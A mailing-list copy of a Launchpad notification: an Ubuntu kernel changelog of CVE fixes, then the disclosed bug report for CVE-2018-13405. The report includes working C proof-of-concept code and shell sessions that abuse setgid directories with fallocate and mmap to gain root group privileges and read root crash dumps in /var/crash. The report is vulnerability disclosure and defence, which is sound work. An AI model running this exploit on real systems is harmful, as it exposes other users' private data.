group.of.nepali.translators team mailing list archive
-
group.of.nepali.translators team
-
Mailing list archive
-
Message #25708
[Bug 1779923] Re: other users' coredumps can be read via setgid directory and killpriv bypass
This bug was fixed in the package linux - 3.13.0-157.207
---------------
linux (3.13.0-157.207) trusty; urgency=medium
* linux: 3.13.0-157.207 -proposed tracker (LP: #1787982)
* CVE-2017-5715 (Spectre v2 retpoline)
- SAUCE: Fix "x86/retpoline/entry: Convert entry assembler indirect jumps"
* CVE-2017-2583
- KVM: x86: fix emulation of "MOV SS, null selector"
* CVE-2017-7518
- KVM: x86: fix singlestepping over syscall
* CVE-2017-18270
- KEYS: prevent creating a different user's keyrings
* Update to upstream's implementation of Spectre v1 mitigation (LP: #1774181)
- Documentation: Document array_index_nospec
- array_index_nospec: Sanitize speculative array de-references
- x86: Implement array_index_mask_nospec
- x86: Introduce barrier_nospec
- x86/get_user: Use pointer masking to limit speculation
- x86/syscall: Sanitize syscall table de-references under speculation
- vfs, fdtable: Prevent bounds-check bypass via speculative execution
- nl80211: Sanitize array index in parse_txq_params
- x86/spectre: Report get_user mitigation for spectre_v1
- x86/kvm: Update spectre-v1 mitigation
- nospec: Allow index argument to have const-qualified type
- nospec: Move array_index_nospec() parameter checking into separate macro
- nospec: Kill array_index_nospec_mask_check()
- SAUCE: Replace osb() calls with array_index_nospec()
- SAUCE: Rename osb() to barrier_nospec()
- SAUCE: x86: Use barrier_nospec in arch/x86/um/asm/barrier.h
* Prevent speculation on user controlled pointer (LP: #1775137)
- x86: reorganize SMAP handling in user space accesses
- x86: fix SMAP in 32-bit environments
- x86: Introduce __uaccess_begin_nospec() and uaccess_try_nospec
- x86/usercopy: Replace open coded stac/clac with __uaccess_{begin, end}
- x86/uaccess: Use __uaccess_begin_nospec() and uaccess_try_nospec
* CVE-2016-10208
- ext4: validate s_first_meta_bg at mount time
- ext4: fix fencepost in s_first_meta_bg validation
* CVE-2018-10323
- xfs: set format back to extents if xfs_bmap_extents_to_btree
* CVE-2017-16911
- usbip: prevent vhci_hcd driver from leaking a socket pointer address
* CVE-2018-13406
- video: uvesafb: Fix integer overflow in allocation
* CVE-2018-10877
- ext4: verify the depth of extent tree in ext4_find_extent()
* CVE-2018-10881
- ext4: clear i_data in ext4_inode_info when removing inline data
* CVE-2018-1092
- ext4: fail ext4_iget for root directory if unallocated
* CVE-2018-1093
- ext4: fix block bitmap validation when bigalloc, ^flex_bg
- ext4: add validity checks for bitmap block numbers
* CVE-2018-12233
- jfs: Fix inconsistency between memory allocation and ea_buf->max_size
* CVE-2017-16912
- usbip: fix stub_rx: get_pipe() to validate endpoint number
* CVE-2018-10675
- mm/mempolicy: fix use after free when calling get_mempolicy
* CVE-2017-8831
- saa7164: fix sparse warnings
- saa7164: fix double fetch PCIe access condition
* CVE-2017-16533
- HID: usbhid: fix out-of-bounds bug
* CVE-2017-16538
- media: dvb-usb-v2: lmedm04: move ts2020 attach to dm04_lme2510_tuner
- media: dvb-usb-v2: lmedm04: Improve logic checking of warm start
* CVE-2017-16644
- hdpvr: Remove deprecated create_singlethread_workqueue
- media: hdpvr: Fix an error handling path in hdpvr_probe()
* CVE-2017-16645
- Input: ims-psu - check if CDC union descriptor is sane
* CVE-2017-5549
- USB: serial: kl5kusb105: fix line-state error handling
* CVE-2017-16532
- usb: usbtest: fix NULL pointer dereference
* CVE-2017-16537
- media: imon: Fix null-ptr-deref in imon_probe
* CVE-2017-11472
- ACPICA: Add additional debug info/statements
- ACPICA: Namespace: fix operand cache leak
* CVE-2017-16643
- Input: gtco - fix potential out-of-bound access
* CVE-2017-16531
- USB: fix out-of-bounds in usb_set_configuration
* CVE-2018-10124
- kernel/signal.c: avoid undefined behaviour in kill_something_info
* CVE-2017-6348
- irda: Fix lockdep annotations in hashbin_delete().
* CVE-2017-17558
- USB: core: prevent malicious bNumInterfaces overflow
* CVE-2017-5897
- ip6_gre: fix ip6gre_err() invalid reads
* CVE-2017-6345
- SAUCE: import sock_efree()
- net/llc: avoid BUG_ON() in skb_orphan()
* CVE-2017-7645
- nfsd: check for oversized NFSv2/v3 arguments
* CVE-2017-9984
- ALSA: msnd: Optimize / harden DSP and MIDI loops
* CVE-2018-1000204
- scsi: sg: allocate with __GFP_ZERO in sg_build_indirect()
* CVE-2018-10021
- scsi: libsas: defer ata device eh commands to libata
* CVE-2017-16914
- usbip: fix stub_send_ret_submit() vulnerability to null transfer_buffer
* CVE-2017-16913
- usbip: fix stub_rx: harden CMD_SUBMIT path to handle malicious input
* CVE-2017-16535
- USB: core: fix out-of-bounds access bug in usb_get_bos_descriptor()
* CVE-2017-16536
- cx231xx-cards: fix NULL-deref on missing association descriptor
* CVE-2017-16650
- net: qmi_wwan: fix divide by 0 on bad descriptors
* CVE-2017-18255
- perf/core: Fix the perf_cpu_time_max_percent check
* CVE-2018-10940
- cdrom: information leak in cdrom_ioctl_media_changed()
* CVE-2018-13094
- xfs: don't call xfs_da_shrink_inode with NULL bp
* other users' coredumps can be read via setgid directory and killpriv bypass
(LP: #1779923) // CVE-2018-13405
- Fix up non-directory creation in SGID directories
* CVE-2017-16529
- ALSA: usb-audio: Check out-of-bounds access by corrupted buffer descriptor
* CVE-2017-2671
- ping: implement proper locking
* CVE-2017-15649
- packet: hold bind lock when rebinding to fanout hook
- packet: in packet_do_bind, test fanout with bind_lock held
* CVE-2017-16527
- ALSA: usb-audio: Kill stray URB at exiting
* CVE-2017-16526
- uwb: properly check kthread_run return value
* CVE-2017-11473
- x86/acpi: Prevent out of bound access caused by broken ACPI tables
* CVE-2017-14991
- scsi: sg: fixup infoleak when using SG_GET_REQUEST_TABLE
* CVE-2017-2584
- KVM: x86: Introduce segmented_write_std
* CVE-2018-10087
- kernel/exit.c: avoid undefined behaviour when calling wait4()
* fscache: Fix hanging wait on page discarded by writeback (LP: #1777029)
- fscache: Fix hanging wait on page discarded by writeback
-- Khalid Elmously <khalid.elmously@xxxxxxxxxxxxx> Mon, 20 Aug 2018
12:07:46 -0400
** Changed in: linux (Ubuntu Trusty)
Status: Fix Committed => Fix Released
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2016-10208
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-11472
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-11473
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14991
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-15649
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16526
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16527
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16529
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16531
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16532
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16533
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16535
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16536
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16537
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16538
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16643
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16644
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16645
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16650
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16911
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16912
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16913
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16914
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-17558
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-18255
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-18270
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-2583
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-2584
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-2671
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-5549
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-5715
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-5897
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-6345
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-6348
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-7518
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-7645
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-8831
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9984
** CVE added: https://cve.mitre.org/cgi-
bin/cvename.cgi?name=2018-1000204
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10021
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10087
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10124
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10675
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10877
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-1092
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-1093
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10940
--
You received this bug notification because you are a member of नेपाली
भाषा समायोजकहरुको समूह, which is subscribed to Xenial.
Matching subscriptions: Ubuntu 16.04 Bugs
https://bugs.launchpad.net/bugs/1779923
Title:
other users' coredumps can be read via setgid directory and killpriv
bypass
Status in linux package in Ubuntu:
In Progress
Status in linux source package in Trusty:
Fix Released
Status in linux source package in Xenial:
Fix Released
Status in linux source package in Bionic:
Fix Released
Status in linux source package in Cosmic:
In Progress
Bug description:
Note: I am both sending this bug report to security@xxxxxxxxxx and filing it in
the Ubuntu bugtracker because I can't tell whether this counts as a kernel bug
or as a Ubuntu bug. You may wish to talk to each other to determine the best
place to fix this.
I noticed halfdog's old writeup at
https://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/
, describing essentially the following behavior in combination with a
trick for then writing to the resulting file without triggering the
killpriv logic:
=============
user@debian:~/sgid_demo$ sudo mkdir -m03777 dir
user@debian:~/sgid_demo$ cat > demo.c
#include <fcntl.h>
int main(void) { open("dir/file", O_RDONLY|O_CREAT, 02755); }
user@debian:~/sgid_demo$ gcc -o demo demo.c
user@debian:~/sgid_demo$ ./demo
user@debian:~/sgid_demo$ ls -l dir/file
-rwxr-sr-x 1 user root 0 Jun 25 22:03 dir/file
=============
Two patches for this were proposed on LKML back then:
"[PATCH 1/2] fs: Check f_cred instead of current's creds in
should_remove_suid()"
https://lore.kernel.org/lkml/9318903980969a0e378dab2de4d803397adcd3cc.1485377903.git.luto@xxxxxxxxxx/
"[PATCH 2/2] fs: Harden against open(..., O_CREAT, 02777) in a setgid directory"
https://lore.kernel.org/lkml/826ec4aab64ec304944098d15209f8c1ae65bb29.1485377903.git.luto@xxxxxxxxxx/
However, as far as I can tell, neither of them actually landed.
You can also bypass the killpriv logic with fallocate() and mmap() -
fallocate() permits resizing the file without triggering killpriv,
mmap() permits writing without triggering killpriv (the mmap part is mentioned
at
https://lore.kernel.org/lkml/CAGXu5jLu6OGkQUgqRcOyQ6DABOwZ9HX3fUQ+-zC7NjLukGKnVw@xxxxxxxxxxxxxx/
):
=============
user@debian:~/sgid_demo$ sudo mkdir -m03777 dir
user@debian:~/sgid_demo$ cat fallocate.c
#define _GNU_SOURCE
#include <stdlib.h>
#include <fcntl.h>
#include <err.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <string.h>
int main(void) {
int src_fd = open("/usr/bin/id", O_RDONLY);
if (src_fd == -1)
err(1, "open 2");
struct stat src_stat;
if (fstat(src_fd, &src_stat))
err(1, "fstat");
int src_len = src_stat.st_size;
char *src_mapping = mmap(NULL, src_len, PROT_READ, MAP_PRIVATE, src_fd, 0);
if (src_mapping == MAP_FAILED)
err(1, "mmap 2");
int fd = open("dir/file", O_RDWR|O_CREAT|O_EXCL, 02755);
if (fd == -1)
err(1, "open");
if (fallocate(fd, 0, 0, src_len))
err(1, "fallocate");
char *mapping = mmap(NULL, src_len, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
if (mapping == MAP_FAILED)
err(1, "mmap");
memcpy(mapping, src_mapping, src_len);
munmap(mapping, src_len);
close(fd);
close(src_fd);
execl("./dir/file", "id", NULL);
err(1, "execl");
}
user@debian:~/sgid_demo$ gcc -o fallocate fallocate.c
user@debian:~/sgid_demo$ ./fallocate
uid=1000(user) gid=1000(user) egid=0(root)
groups=0(root),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),116(scanner),121(wireshark),1000(user)
=============
sys_copy_file_range() also looks as if it bypasses killpriv on
supported filesystems, but I haven't tested that one so far.
On Ubuntu 18.04 (bionic), /var/crash is mode 03777, group "whoopsie", and
contains group-readable crashdumps in some custom format, so you can use this
issue to steal other users' crashdumps:
=============
user@ubuntu-18-04-vm:~$ ls -l /var/crash
total 296
-rw-r----- 1 user whoopsie 16527 Jun 25 22:27 _usr_bin_apport-unpack.1000.crash
-rw-r----- 1 root whoopsie 50706 Jun 25 21:51 _usr_bin_id.0.crash
-rw-r----- 1 user whoopsie 51842 Jun 25 21:42 _usr_bin_id.1000.crash
-rw-r----- 1 user whoopsie 152095 Jun 25 21:43 _usr_bin_strace.1000.crash
-rw-r----- 1 root whoopsie 18765 Jun 26 00:42 _usr_bin_xattr.0.crash
user@ubuntu-18-04-vm:~$ cat /var/crash/_usr_bin_id.0.crash
cat: /var/crash/_usr_bin_id.0.crash: Permission denied
user@ubuntu-18-04-vm:~$ cat fallocate.c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <err.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <string.h>
int main(int argc, char **argv) {
if (argc != 2) {
printf("usage: ./fallocate <file_to_read>");
return 1;
}
int src_fd = open("/bin/cat", O_RDONLY);
if (src_fd == -1)
err(1, "open 2");
struct stat src_stat;
if (fstat(src_fd, &src_stat))
err(1, "fstat");
int src_len = src_stat.st_size;
char *src_mapping = mmap(NULL, src_len, PROT_READ, MAP_PRIVATE, src_fd, 0);
if (src_mapping == MAP_FAILED)
err(1, "mmap 2");
unlink("/var/crash/privileged_cat"); /* in case we've already run before */
int fd = open("/var/crash/privileged_cat", O_RDWR|O_CREAT|O_EXCL, 02755);
if (fd == -1)
err(1, "open");
if (fallocate(fd, 0, 0, src_len))
err(1, "fallocate");
char *mapping = mmap(NULL, src_len, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
if (mapping == MAP_FAILED)
err(1, "mmap");
memcpy(mapping, src_mapping, src_len);
munmap(mapping, src_len);
close(fd);
execl("/var/crash/privileged_cat", "cat", argv[1], NULL);
err(1, "execl");
}
user@ubuntu-18-04-vm:~$ gcc -o fallocate fallocate.c
user@ubuntu-18-04-vm:~$ ./fallocate /var/crash/_usr_bin_id.0.crash > /var/crash/_usr_bin_id.0.crash.stolen
user@ubuntu-18-04-vm:~$ ls -l /var/crash
total 384
-rwxr-sr-x 1 user whoopsie 35064 Jul 3 19:22 privileged_cat
-rw-r----- 1 user whoopsie 16527 Jun 25 22:27 _usr_bin_apport-unpack.1000.crash
-rw-r----- 1 root whoopsie 50706 Jun 25 21:51 _usr_bin_id.0.crash
-rw-r--r-- 1 user whoopsie 50706 Jul 3 19:22 _usr_bin_id.0.crash.stolen
-rw-r----- 1 user whoopsie 51842 Jun 25 21:42 _usr_bin_id.1000.crash
-rw-r----- 1 user whoopsie 152095 Jun 25 21:43 _usr_bin_strace.1000.crash
-rw-r----- 1 root whoopsie 18765 Jun 26 00:42 _usr_bin_xattr.0.crash
user@ubuntu-18-04-vm:~$ mkdir root_crash_unpacked
user@ubuntu-18-04-vm:~$ # work around bug in apport-unpack
user@ubuntu-18-04-vm:~$ sed -i 's|^UserGroups: $|UserGroups: 0|' /var/crash/_usr_bin_id.0.crash.stolen
user@ubuntu-18-04-vm:~$ apport-unpack /var/crash/_usr_bin_id.0.crash.stolen root_crash_unpacked/
user@ubuntu-18-04-vm:~$ file root_crash_unpacked/CoreDump
root_crash_unpacked/CoreDump: ELF 64-bit LSB core file x86-64, version 1 (SYSV), SVR4-style, from 'id', real uid: 0, effective uid: 0, real gid: 0, effective gid: 0, execfn: '/usr/bin/id', platform: 'x86_64'
=============
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1779923/+subscriptions
